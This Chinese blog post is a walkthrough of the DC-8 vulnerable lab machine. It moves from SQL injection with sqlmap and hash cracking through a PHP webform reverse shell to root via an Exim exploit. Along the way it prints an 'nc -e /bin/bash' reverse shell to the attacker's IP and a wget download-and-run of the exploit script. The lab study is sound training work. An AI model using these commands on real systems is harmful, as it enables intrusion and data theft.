DC-8靶机做题记录

已于 2024-07-22 10:28:40 修改
阅读量990 收藏 22
点赞数 16
分类专栏: 打靶 文章标签: 笔记 安全 网络安全 web安全 http
于 2024-01-23 20:59:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64422989/article/details/135789061
版权

靶机下载地址:

链接:https://pan.baidu.com/s/1jPMYoyFZXqr7sVMElHqGcw?pwd=ypq9 
提取码:ypq9

参考:

image.png
描述:

Description 描述
Back to the Top
返回顶部
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
DC-8是另一个专门建造的易受攻击实验室,旨在获得渗透测试领域的经验。

This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
这一挑战介于实际挑战和“概念验证”之间,即在Linux上安装和配置的双因素身份验证是否可以防止Linux服务器被利用。

The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
这一挑战的“概念验证”部分是由于推特上有人问到关于双因素身份验证和Linux的问题,也是由于@theart42的建议。

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
这个挑战的最终目标是绕过双因素身份验证,获取root并读取唯一标志。

You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.
除非您尝试通过SSH登录,否则您可能甚至不知道已经安装和配置了双因素身份验证,但它肯定在那里并完成了它的工作。

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7上向我推特寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。

1、导入VMware虚拟机

下载完成后,得到DC-8.ova文件,导入到VMware后,设置靶机和kali的网络连接模式为NAT模式,靶机会自动获取ip地址。

2、拍摄快照,防止后面出问题,有快照还能恢复到初始设置
image.png
3、kali创建一个目录 dc8 ,后续的操作都在该目录下进行
image.png

使用工具

攻击者:kali 192.168.1.128
靶机:dc-7 192.168.1.136

一.信息收集

基础信息查询

0x01 查看存活主机 0x02 查看开放端口 和 0x03 查看端口服务

这几条命令的用法可以看之前的博客,这里不再赘述
image.png
image.png

目录扫描
dirsearch -u "192.168.1.136" -e php -i 200

image.png

页面探测

CMS探测

whatweb 192.168.1.136

image.png
发现又是Drupal 7
image.png
点击蓝色的这里,查看URL发现有相关的参数,猜测存在SQL注入漏洞
image.png
在URL后面加一个单引号('),发现页面显示SQL报错语句,确认存在SQL注入漏洞

二、渗透过程

解下来用SQLmap进行自动化注入

爆库名

sqlmap -u "http://192.168.1.136/?nid=1" --batch --dbs
  • –batch 表示不用询问我,直接Yes,一直进行下去
  • –dbs 表示列出数据库

image.png

爆表名

sqlmap -u "http://192.168.1.136/?nid=1" --batch -D d7db --tables
  • -D 指定数据库,如果数据库名含有特殊字符要用双引号包裹
  • –tables 列出数据表名

image.png

爆列名

sqlmap -u "http://192.168.1.136/?nid=1" --batch -D d7db -T users --columns

image.png

爆字段名

sqlmap -u "http://192.168.1.136/?nid=1" --batch -D d7db -T users -C uid,name,pass --dump

image.png
得到了两个用户,还有hash值
我们先新建一个文件,把这两个密码hash保存起来

  • 记得要用单引号,不然会失败,因为双引号是转义了

image.png

爆破密文
john passwd.txt

image.png
只爆破出了一个密码turtle
接下来测试一下是谁的密码
找到刚刚目录扫描的时候,扫到一个登录的目录/user/login/
image.png
或者在[http://192.168.1.136/robots.txt](http://192.168.1.136/robots.txt)里面也可以看到,在Disallow的那里
image.png
admin的登不上,说明是john的密码
image.png
登陆成功
image.png

反弹shell

点击Contact Us,里面的Webform
image.png
那我们直接写一句话木马,来进行反弹shell
image.png
点击下面的Save configuration保存
image.png
然后我们先在kali 监听 1234 端口
image.png
然后我们提交了东西之后,才能让它去解析PHP代码
image.png
成功把shell弹过来了
image.png

优化shell

python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm

image.png

提权

查看是否存在suid提权

find / -perm -4000 -print 2>/dev/null

image.png
发现exim4
查看一下exim4的版本,发现是4.89版本

exim4 --version

image.png
搜索一下漏洞库里有没有,发现符合版本标准,并且可以提权(Privilege Escalation)的

searchsploit exim

image.png
先把这个脚本下载到当前目录,再改个简单一点的名字

searchsploit -m 46996.sh

image.png
然后在这个目录开启HTTP服务,为了能够让靶机把这个脚本下载下来,并在靶机执行这个脚本

python -m http.server 80

image.png
看到这个页面就说明HTTP服务开好了
image.png
来到靶机的shell,将EXP脚本下载下来
首先来到/tmp目录,因为这个tmp目录的权限最大

wget http://192.168.1.128/a.sh

image.png
image.png
给脚本加上执行权限

chmod +x a.sh
  • +x 表示给执行权限

image.png
然后执行脚本来提权
查看脚本有两种使用方式

  • ./a.sh -m setuid
  • ./a.sh -m netcat

image.png
image.png
我们选netcat

./a.sh -m netcat

获得root权限
查看根目录下的flag文件

获得flag

image.png
image.png

总结

  1. 信息收集很重要,从robots.txt和扫目录的时候获得后台登录的目录
  2. 对SQL注入的认识要能意识到是否存在SQL注入,还有对SQLmap的使用要熟练
  3. 密码爆破工具john的用法
  4. 反弹shell的一句话要熟练nc -e /bin/bash 192.168.1.128 1234
  5. 还有优化shell的命令python -c "import pty;pty.spawn('/bin/bash')"
  6. 最后提权,对漏洞库的用法和搜索要熟练

完毕!

Fab1an要努力~
关注
  • 16
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-6靶机做题记录
Fab1an的博客
01-21 1294
hosts文件域名解析对WordPress的了解程度,比如后台是wp-admin,还有一个readme.htmlWordPress的扫描器叫wpscan,以及wpscan的用法,可以百度要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式进入后台找寻一个能写php代码的地方,把shell弹回来找到一个插件的漏洞,然后用它来反弹shellnamp提权,用nse脚本提权。
DC-5靶机做题记录
Fab1an的博客
01-20 1376
信息收集很重要学到反弹shell,日志文件包含FUZZpython启动HTTP服务学到了提权的知识点巩固。
DC-9靶机做题记录
Fab1an的博客
01-24 998
信息收集,目录扫描,开头的步骤很重要SQlmap自动化注入的操作了解加深了解到了Knock服务Hydra工具的使用提权,对/etc/pawwd 文件格式的了解,以及对/etc/sudoers 文件的了解。
DC-7靶机做题记录
Fab1an的博客
01-21 1002
第一步非常难,就是要找到它的Github的信息泄露对drush的了解,可能国外的人用到就比较多要解决它支持PHP代码的问题,需要安装支持PHP的插件对定时任务的了解,邮件的定时任务,能够去发现一些脚本的内容。
vulnhub-DC-9靶机渗透记录(适合新手详细版)
m0_62584974的博客
09-09 1355
vulnhub-DC-9靶机渗透记录,超详细,适合新手
DC-1靶机(新手村)
weixin_42238862的博客
02-14 1万+
今天开始呢,我打算开始一系列的渗透测试靶机教程,有不足的地方,希望大佬抬手轻喷!毕竟学生党写这个也就是为了记录一下自己渗透测试过程中学到的东西,希望能帮助刚刚进来的同学!!!不多说我们开始今天的DC-1靶机 首先呢当然是进行信息收集,信息收集当然得先去看看对面是谁了呀,都不知道对面是谁怎么打它对不对,知道对面是谁就是确定目标机的IP地址,那我起手就是arp-scan进行探测局域网内存活的主机了呀! 至于为什么判断这个是目标机的原因就很简单了,我们对每个IP的信息进行分析,xiaomi自然就是我得虚拟手机了
新手DC-1通关思路
SuchAprettyBoi的博客
08-10 565
文章目录前言一、DC-1是什么?二、准备流程1.要用到的工具2.初始化虚拟机3.开始前夕!!!三、开始渗透总结 前言 通关后,来复盘一下,顺便巩固一下学到的新东西 一、DC-1是什么? DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. DC-1 是一个特意建造的易受攻击的靶机环境,目的是在渗透测试领域获得经验。 It
DC系列靶机1通关教程_dc1 靶机
2301_82242964的博客
06-24 942
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
【Vulnhub系列】Vulnhub_DC-8靶场渗透(原创)
Lusen的博客
07-26 879
Vulnhub系列-DC-8靶场做题记录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
热门推荐
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
2024年最全CVE-2024-26923漏洞分析_cve-2024–26923(1),2024最新网易网络安全面试题目
2401_84544363的博客
05-05 1134
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD域中涉及身份认证标识的问题不止一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD域证书有效时间长,因此对于AD域的提权和权限维持都有很高的利用价值。
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
No.1-Bastion-难度简单-HTB-walkthrough
weixin_43851945的博客
01-10 1946
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体...
对Linux 提权的简单总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 887
什么是权限 在Linux 系统中,ls -al即可查看列出文件所属的权限。这里我用kali 系统来演示。 …… drwxr-xr-x 2 kali kali 4096 Jan 27 12:52 Downloads -rw-r--r-- 1 root root 903 Jun 14 11:33 exp.html -rw-r--r-- 1 root root 153600 May 5 09:42 flag lrwxrwxrwx 1 kali kali 28 May 1.
维度不固定的多维数组形参笔记
H2z1220的博客
09-05 211
假如我有多个元素个数都不一致的多维数组都需要调用这个函数进行处理,这个形参问题就凸显出来了,总不能创建N个不同的函数来进行处理吧?这样也太繁琐了,而且也适用度不高。这个函数可以传入多维数组,但元素个数必须是固定的,假如传入一个str[][20],元素个数不一样的数组,那么这个函数就不适用了,且会报错。所有数据在存储空间里面都是有地址的,那么就可利用指针寻址来获取到相应的数据。在查找了一些资料后受到了一点启发。而这里也可利用指针来指向多维数组。
C语言:刷题笔记
weixin_45930573的博客
09-04 413
c语言刷题记录
【机器人工具箱Robotics Toolbox开发笔记(十)】机器人微分运动学
m0_72676510的博客
09-07 251
机器人工具箱中,可用函数SerialLink.jacob0()求出对应某个位姿下绝对坐标系中的雅可比矩阵,用SerialLink.jacobn()求出对应某个位姿下工具坐标系中的雅可比矩阵。
【C++学习笔记】数组与指针(三)
最新发布
qq_38196449的博客
09-09 948
0(空字符)
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Fab1an要努力~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值